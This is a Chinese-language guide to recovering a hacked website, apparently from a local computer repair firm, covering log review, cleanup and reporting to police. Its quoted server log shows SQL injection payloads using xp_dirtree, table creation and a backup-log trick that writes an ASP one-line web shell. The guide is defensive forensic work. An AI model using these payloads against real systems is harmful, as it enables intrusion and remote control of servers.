很多朋友都曾经遇到过网站被黑或者插入恶意代码的经历。可能大家以为只要把这些代码删除了就可以了，但是，道高一尺，经开区上门电脑维修公司总结了几个步骤如下，并根据以下几个步骤写了份案例附后，希望对大家有所帮助：

一、下载服务器日志，ftp传输日志。

二、经开区上门电脑维修替换所有恶意代码

进行下载日志的同时，应该开始删除恶意代码，以免影响用户体验。如果你拥有服务器，推荐你使用老马写的findstr，把恶意插入的代码批量替换掉。如果你使用虚拟主机，有部分虚拟主机提供批量替换功能。如果你的虚拟主机没有提供这样的功能（破烂货，赶快换掉），那你可以去下载一个雷客图ASP站长安全助手。来进行此项操作。这项操作要谨慎点，因为是对内容直接进行替换，稍微一马虎可能让你的网页内容面目全非。

三、下载到本地杀毒，或者服务端杀毒

四、同时，查找日志中的敏感词，如“select”，“and%201=1”，获得对方ip

五、在日志中查找该ip，了解对方入侵的过程。

在这些日志中查找“220.162.26.96”这个字符串。发现以下一些记录：//后面为记录

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[41425] 2007-07-12 03:52:40 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626 and exists (select * from sysobjects) -- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64

//123.asp出现漏洞，对方使用注入语句在获得权限

[41492] 2007-07-12 03:52:56 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;DROP TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) Insert D99_Tmp exec master..xp_dirtree "D:\", 1,1-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64

[41494] 2007-07-12 03:52:56 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626 And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From D99_Tmp)=0 --|57|80040e07|将_varchar_值_‘|13|‘_转换为数据类型为_int_的列时发生语法错误。 80 - 220.162.26.96 Internet+Explorer+6.0 500 0 0

[47001] 2007-07-12 04:23:06 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;DROP TABLE D99_Tmp;CREATE TABLE D99_Tmp(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) Insert D99_Tmp exec master..xp_dirtree "e:\wwwroot\", 1,1-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64

//利用了master..xp_dirtree

[47635] 2007-07-12 04:24:47 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;alter database mytable set RECOVERY FULL-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+KuGooSoft) 200 0 0

[47699] 2007-07-12 04:25:12 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;create table ahcmd (a image)-- 80 - 220.162.26.96 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+KuGooSoft) 200 0 0

[47754] 2007-07-12 04:25:25 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;backup log mytable to disk = ‘c:\ahcmd‘ with init-- 80 - 220.162.26.96

[47758] 2007-07-12 04:25:31 W3SVC629501503 http://*******/ GET http://*******/123.asp cid=187&id=1626;insert into ahcmd (a) s (‘<%execute request("")%>‘)-- 80 - 220.162.26.96

//插入一句话木马

七、经开区上门电脑维修弥补对方入侵漏洞。

八、经开区上门电脑维修修改ftp密码，超级管理员密码，3389登陆端口，用户名，密码。

九、将对方的ip，入侵时间，日志提交给当地网警。Ping对方使用的僵尸网站，查询对方网站所用ip，打电话到对方网站所在地的通信管理局投诉。